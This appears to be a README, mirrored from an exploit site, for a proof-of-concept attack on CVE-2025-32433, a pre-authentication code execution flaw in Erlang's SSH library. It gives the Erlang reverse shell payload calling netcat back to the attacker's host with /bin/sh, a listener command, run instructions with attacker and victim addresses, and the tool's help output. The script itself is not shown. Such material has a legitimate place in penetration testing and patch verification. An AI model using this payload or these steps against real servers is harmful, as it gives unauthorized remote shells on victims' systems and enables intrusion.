## https://sploitus.com/exploit?id=5C4FA20D-134D-508E-807F-26257CC28B20
# CVE-2025-32433 Erlang SSH Library Exploit
A proof-of-concept exploit for **CVE-2025-32433**, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed `SSH_MSG_CHANNEL_REQUEST` packets.
---
## Features
- **Original exploit** by Matthew Keeley
- **Updated version** by Tyler Ramsbey:
- Command‑line arguments for **LHOST**, **LPORT**, **RHOST**, and **RPORT**
- Built‑in help and usage via `argparse`
- Erlang‑style reverse shell payload using `os:cmd("nc LHOST LPORT -e /bin/sh").`
- Clean function decomposition and status logging for each stage
---
## Prerequisites
- **Python 3**
- A working `nc` (Netcat) listener on your attack machine
- Network access to the target SSH service (default port `22`)
---
## Usage
1. **Start your listener** on the attack box:
```sh
nc -lvnp 4444
```
2. **Run the exploit**:
```sh
python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
```
3. **Wait for the shell** to connect back to your listener.
### Help Menu
```sh
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]
Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell
optional arguments:
-h, --help show this help message and exit
-lh LHOST, --lhost LHOST
Local host/IP to receive the reverse shell
-lp LPORT, --lport LPORT
Local port to receive the reverse shell
-rh RHOST, --rhost RHOST
Target SSH server IP (default: 10.10.248.101)
-rp RPORT, --rport RPORT
Target SSH server port (default: 22)
```
---
## Credits
- **Original script** by Matthew Keeley ([MattKeeley](https://github.com/MattKeeley))
- **This updated version** by Tyler Ramsbey
---
## Disclaimer
Use this code only on systems you own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.